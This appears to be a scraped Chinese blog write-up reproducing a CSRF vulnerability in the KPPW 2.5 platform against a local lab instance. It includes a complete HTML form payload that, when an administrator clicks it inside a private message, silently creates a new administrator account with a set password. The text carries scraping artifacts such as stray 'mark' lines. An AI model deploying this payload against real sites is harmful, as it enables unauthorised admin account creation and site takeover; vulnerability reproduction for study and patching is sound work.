KPPW2.5 漏洞利用--CSRF

kppw2.5 CSRF漏洞复现

漏洞说明

http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send

收件人填目标用户名,标题随便,内容没有转义 ,因此提交内容处可能存在xss,不过过滤了敏感标签和 onerror onload等事件。虽然不能加载js代码,可是仍是能够注入html代码,能够用xss漏洞注入html代码触发csrfphp

漏洞利用

http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send

收件人填写admin(网站管理员),向管理员提交私信,内容为咱们构造的html代码html

<form action="http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=
" method="post">
    <input type=hidden name="edituid" value="">
    <input type=hidden name="fds[username]" value="qianlan">
    <input type=hidden name="fds[truename]" value="">
    <input type=hidden name="fds[phone]" value="">
    <input type=hidden name="fds[qq]" value="">
    <input type=hidden name="fds[indus_pid]" value="">
    <input type=hidden name="fds[indus_id]" value="">
    <input type=hidden name="fds[birthday]" value="">
    <input type=hidden name="fds[password]" value="newadmin">
    <input type=hidden name="fds[email]" value="x@q.c">
    <input type=hidden name="fds[group_id]" value="1">
    <input type="submit" name="is_submit" value="1">
</form>

mark
mark

 

http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=这个url是后台管理员添加用户的url,咱们构造表单,action的值设为这个url,写几个隐藏表单诱使管理员去点击提交,就会以管理员的身份去添加一个新的管理员,固然这不是网站管理员的意愿,而是咱们的web

提交完成后退出当前网站用户,模拟管理员登录查看私信,能够看到一个按钮,单单一个按钮,看到的人总会想着去点一下,固然这个按钮能够构造的更具备吸引力xss


mark
mark

当点击按钮事后,管理员就会在不知情的状况下发起添加用户的http请求去添加一个用户名为qianlan密码为newadmin的用户,固然这是咱们构造的,看用户列表能够看到多了一个名为qianlan的用户,咱们登录一下能够成功进入后台,进行下一步的渗透post

 

mark
mark
mark

 

 

 

参考连接(http://lawlietweb.com/2018/01/12/KPPW25xss/)网站

相关文章
相关标签/搜索